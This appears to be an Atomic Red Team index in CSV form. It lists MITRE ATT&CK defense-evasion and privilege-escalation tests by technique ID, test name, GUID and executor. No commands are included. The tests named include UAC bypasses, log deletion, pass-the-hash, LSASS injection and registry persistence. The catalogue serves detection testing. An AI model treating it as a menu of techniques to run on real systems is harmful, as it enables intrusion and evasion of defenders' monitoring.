defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,4,AWS - Disable CloudTrail Logging Through Event Selectors using Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,5,AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus,22d89a2f-d475-4895-b2d4-68626d49c029,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC Flow Logs using Stratus,93c150f5-ad7b-4ee3-8992-df06dec2ac79,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
privilege-escalation,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
